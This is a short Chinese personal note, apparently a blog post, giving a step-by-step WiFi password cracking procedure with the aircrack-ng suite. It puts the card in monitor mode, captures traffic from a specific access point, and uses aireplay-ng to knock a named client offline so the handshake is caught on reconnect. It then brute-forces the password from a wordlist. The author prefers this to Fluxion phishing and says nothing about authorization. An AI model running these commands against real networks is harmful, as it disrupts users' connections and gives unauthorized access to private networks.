随笔

• 2021-10-29 08:01
  个人感觉还是使用暴力破解靠谱一些，使用Fluxion虽然可以进行钓鱼攻击，但是不能确定被攻击方是否会被钓鱼，而暴力破解则是将主动权握在自己手里
• 2021-10-29 08:06
  暴力破解是需要一个较为完善的字典的，否则暴力破解基本失败

步骤

• 查看网卡是否处于监听状态
  shell airmon-ng
  
• 开启无线监听模式
  shell airmon-ng start wlan0
  
• 再次查看网卡状态
  shell airmon-ng
  
• 探测周围WiFi信息
  shell airodump-ng wlan0mon #按两次q可以退出，不必使用Ctrl+C #BSSID -> WiFi的MAC地址 #PWR -> 信号强度，数值越小信号越强 #CH -> 所处信道 #ESSID -> WiFi名称
  
• 进行抓包
  shell airodump-ng -c 6 --bssid 12:80:8E:A0:9C:BD -w ./attack wlan0mon
  
• 获取连接该WiFi的设备信息
  
• 进行攻击，将WiFi打断线，从而在其重新连接WiFi时抓取带有正确密码的握手包(需要新开一个终端)
  shell aireplay-ng -0 20 -a 12:80:8E:A0:9C:BD -c 3C:58:C2:6F:58:1A wlan0mon
  
• 回车执行上述命令，检查是否抓取到带有密码的握手包
  
• 进行密码暴力破解
  shell aircrack-ng -w wifiPass.txt attack-01.cap #wifiPass.txt -> 存放WiFi密码 #attack-01.cap -> 刚才抓包获取数据包
  
• 密码破解完成